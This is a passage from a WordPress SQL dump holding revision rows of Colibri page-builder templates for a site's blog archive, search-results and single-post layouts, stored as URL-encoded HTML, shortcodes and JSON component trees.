div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22435-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22435-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>[colibri_layout_wrapper name=\"navigation_container\"]\n      <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n            <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n            <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n            <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>[/colibri_layout_wrapper]</div>\n  </div>\n</div>','main_archive','','inherit','closed','closed','','34-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',34,'https://gsudice.dataconn.net/?p=80',0,'revision','',0),(81,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"40-m5\",\"parentId\":\"40-m4\",\"partialId\":40,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"40-m5\",\"index\":1,\"id\":\"40-m6\",\"partialId\":40,\"styleRef\":143,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":142,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":1,\"id\":\"40-m4\",\"partialId\":40,\"styleRef\":141,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"parentId\":\"40-m3\",\"id\":\"40-m7\",\"partialId\":40,\"styleRef\":144,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-meta\",\"parentId\":\"40-m3\",\"id\":\"40-m8\",\"partialId\":40,\"styleRef\":145,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"| \"},\"slot\":null,\"index\":3},{\"name\":\"hop-post-excerpt\",\"id\":\"40-m9\",\"parentId\":\"40-m3\",\"partialId\":40,\"styleRef\":146,\"type\":\"main\"},{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"40-m11\",\"parentId\":\"40-m10\",\"partialId\":40,\"styleRef\":148,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":4,\"id\":\"40-m10\",\"partialId\":40,\"styleRef\":147,\"type\":\"main\"}],\"id\":\"40-m3\",\"parentId\":\"40-m2\",\"partialId\":40,\"styleRef\":140,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"40-m1\",\"index\":0,\"id\":\"40-m2\",\"partialId\":40,\"styleRef\":139,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"40-m13\",\"parentId\":\"40-m12\",\"partialId\":40,\"styleRef\":150,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m14\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m14\",\"index\":0,\"id\":\"40-m15\",\"partialId\":40,\"styleRef\":152,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"stateType\":\"hover\",\"prevLabel\":\"Back\"}}],\"styleRef\":151,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m16\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"40-m16\",\"index\":0,\"id\":\"40-m17\",\"partialId\":40,\"styleRef\":154,\"type\":\"main\",\"props\":{\"stateType\":\"active\"}}],\"styleRef\":153,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m18\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m18\",\"index\":0,\"id\":\"40-m19\",\"partialId\":40,\"styleRef\":156,\"type\":\"main\",\"props\":{\"stateType\":\"hover\",\"nextLabel\":\"Next\"}}],\"styleRef\":155,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m1\",\"index\":4,\"id\":\"40-m12\",\"partialId\":40,\"styleRef\":149,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-archive-navigation\",\"slot\":null,\"parentId\":\"40-m21\",\"index\":1,\"id\":\"40-m22\",\"partialId\":40,\"styleRef\":159,\"type\":\"main\"}],\"id\":\"40-m21\",\"parentId\":\"40-m20\",\"partialId\":40,\"styleRef\":158,\"type\":\"main\"}],\"id\":\"40-m20\",\"parentId\":\"40-m1\",\"partialId\":40,\"styleRef\":157,\"type\":\"main\",\"props\":{\"name\":\"Search results\",\"attrs\":{\"id\":\"search-results\"}}}],\"id\":\"40-m1\",\"partialId\":40,\"styleRef\":138,\"type\":\"main\"}','','','inherit','closed','closed','','41-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',41,'https://gsudice.dataconn.net/?p=81',0,'revision','',0),(82,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n    <!---->\n    <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n      <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22639-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22639-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22639-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22639-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%22639-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%22639-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22639-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%3Csvg%20version=%221.1%22%20xmlns=%22http://www.w3.org/2000/svg%22%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20id=%22arrow-right%22%20viewBox=%220%200%20512%20545.5%22%3E%3Cpath%20d=%22M299.5%20140.5l136%20136%2011%2011.5-11%2011.5-136%20136-23-23L385%20304H64v-32h321L276.5%20163.5z%22%3E%3C/path%3E%3C/svg%3E%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n      </div>\n  </div>[colibri_layout_wrapper name=\"navigation_container\"]\n  <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n        <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n            <!---->\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n        <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n        <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n        <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>[/colibri_layout_wrapper]\n  <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n        <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <hop-archive-navigation previewid=\"639-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_search','','inherit','closed','closed','','40-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',40,'https://gsudice.dataconn.net/?p=82',0,'revision','',0),(86,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2231-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%2231-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2231-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%